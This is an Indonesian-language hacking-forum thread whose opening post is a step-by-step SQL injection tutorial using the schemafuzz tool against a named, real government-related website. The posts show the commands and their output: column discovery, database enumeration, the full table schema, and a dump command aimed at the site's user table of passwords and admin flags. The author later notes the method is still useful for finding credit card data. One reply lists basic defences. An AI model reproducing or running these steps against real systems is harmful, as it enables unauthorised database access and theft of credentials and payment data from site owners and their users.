Blacklist Team
Would you like to react to this message? Create an account in a few clicks or log in to continue.

SQL injection with schemafuzz

5 posters

Go down

SQL injection with schemafuzz Empty SQL injection with schemafuzz

Post by angelblood Fri Apr 16, 2010 9:00 am

Hey dude, sekarang gw bakal kasih tutorial tentang SQL inject pake schemafuzz, mulai !
Langkah pertama, siapin :
1. Python (untuk pengguna windows harus install dulu, untuk linux, LANJUUUUT !)
2. Schemafuzz, bisa dicari lewat google (banyak kok, apalagi di darkc0de.com)
3. Kopi
4. Cemilan
5. Sampoerna mild sebungkus

Lanjut dengan mencari bugs pada website target yang vuln (biasanya terdapat pada halaman news,berita dan masih banyak lagi).
Untuk tau web tersebut vuln atau kagak, bisa di cek dengan cara memberikan single quote ( ' ) diakhir URL target, contoh : [You must be registered and logged in to see this link.] ==> perhatiin tanda ( ' ).
Kalo halaman website keluar pesan error seperti "mySQL syntax error . . ." berarti website tersebut vuln terhadap SQL injection.
Biar lebih mudah, file schemafuzz.py nya pasang di desktop aja.
Terus masuk ke terminal (linux) atau command prompt (windows) dan masuk ke desktop dengan cara (ketik di command prompt) : cd Desktop.
cari kolom di web target dengan cara ngejalanin schemafuzz, command :
schemafuzz.py --findcol -u [You must be registered and logged in to see this link.]
hasil :


[+] URL:http://www.ditplb.or.id/profile.php?id=1--
[+] Evasion Used: "+" "--"
[+] 14:10:38
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,
[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL: [You must be registered and logged in to see this link.]
[+] darkc0de URL: [You must be registered and logged in to see this link.]
[-] Done!
Dari data di atas, banyaknya kolom ada 3 (wah,dikit banget) !
Terus cari nama database, command :
schemafuzz.py --dbs -u [You must be registered and logged in to see this link.]
hasil :


[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:15:38
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.51a-24+lenny3
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
[-] [14:16:13]
[-] Total URL Requests 3
[-] Done
nama database nya dapet tuh.
langsung cek tabel dan kolomnya (jangan lupa di belakangan URL, kasih command : -D namadatabase), command :
schemafuzz.py --schema -u [You must be registered and logged in to see this link.] -D t15618_plb
hasil :


[+] URL:http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:20:00
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_plbid@localhost
Version: 5.0.51a-24+lenny3
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11

[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin

[-] [14:25:13]
[-] Total URL Requests 48
[-] Done

Terakhir, masukin command :
schemafuzz.py --dump -u [You must be registered and logged in to see this link.] -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin

HASIL : GUNAKAN DENGAN BIJAK !!

APAPUN YANG ANDA LAKUKAN SETELAH MEMBACA TUTORIAL INI BUKAN TANGGUNG JAWAB PENULIS. Twisted Evil
angelblood
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 33
Location : Depok, Jawa Barat

https://blacklist-team.forumotion.com

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by cRim3²¹ Fri Apr 16, 2010 9:11 pm

Laughing
cRim3²¹
cRim3²¹

Posts : 43
Reputation : 4
Join date : 2010-04-16
Location : Hidden elf

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by angelblood Sat Apr 17, 2010 12:49 am

ampun kk, jangan ketawain tutorial aku, aku emang cupu dalam masalah ini.
No
angelblood
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 33
Location : Depok, Jawa Barat

https://blacklist-team.forumotion.com

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by cRim3²¹ Sat Apr 17, 2010 1:17 am

aq jga tidak mengerti msalah SQL.. Sad

mkasih buat ilmunya kk..


sedikit info yg mungkin udh basi...
______________________________________________________
khusus buat kakang admin & web programer Very Happy
______________________________________________________

Cara pencegahan SQL yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
mungkin bsa bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang. (Embarassed )
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


share yg bodoh.. lol!
cRim3²¹
cRim3²¹

Posts : 43
Reputation : 4
Join date : 2010-04-16
Location : Hidden elf

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by cRim3²¹ Sat Apr 17, 2010 1:37 am

^
l
l
l
copas
cRim3²¹
cRim3²¹

Posts : 43
Reputation : 4
Join date : 2010-04-16
Location : Hidden elf

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by angelblood Sat Apr 17, 2010 1:56 am

kan ini tutor buat newbie kk, kalo cuma sekedar untuk cari CC ya masih ampuh kok cara yg satu ini.

kecuali kita mau ngedump situs2 gede, sama aja buang2 waktu kalo pake cara ini, karna tabel yang ke baca bisa sampe ratusan bahkan ribuan.

tapi bagus juga, kasih cara defend.
thanks.
angelblood
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 33
Location : Depok, Jawa Barat

https://blacklist-team.forumotion.com

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by Hacker Ndeso Tue Apr 20, 2010 12:22 pm

nimbrung dunks.... Twisted Evil
Hacker Ndeso
Hacker Ndeso

Posts : 1
Reputation : 5
Join date : 2010-04-18

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by angelblood Tue Apr 20, 2010 1:05 pm

alih profesi leng ?
lol!
angelblood
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 33
Location : Depok, Jawa Barat

https://blacklist-team.forumotion.com

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by mummi_bakar Fri Jun 11, 2010 7:12 pm

we...gtu ya... Very Happy
mummi_bakar
mummi_bakar

Posts : 15
Reputation : 5
Join date : 2010-06-11
Location : C:\Documents and Settings\Admin\mummi_bakar

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by angelblood Sat Jun 12, 2010 4:50 pm

wah, master mana nih yg baru gabung ?!
angelblood
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 33
Location : Depok, Jawa Barat

https://blacklist-team.forumotion.com

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by mummi_bakar Sun Jun 13, 2010 7:07 pm

ane newbe kk... Wink

mohon bimbingn yak,
mummi_bakar
mummi_bakar

Posts : 15
Reputation : 5
Join date : 2010-06-11
Location : C:\Documents and Settings\Admin\mummi_bakar

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by angelblood Sun Jun 13, 2010 8:59 pm

ngerendah ni yeee.
angelblood
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 33
Location : Depok, Jawa Barat

https://blacklist-team.forumotion.com

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by anak_luchu Thu Jul 29, 2010 4:15 pm

Very Happy

anak_luchu

Posts : 2
Reputation : 5
Join date : 2010-04-25

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by angelblood Thu Jul 29, 2010 4:26 pm

Twisted Evil
angelblood
angelblood
Admin

Posts : 106
Reputation : -2
Join date : 2010-04-16
Age : 33
Location : Depok, Jawa Barat

https://blacklist-team.forumotion.com

Back to top Go down

SQL injection with schemafuzz Empty Re: SQL injection with schemafuzz

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum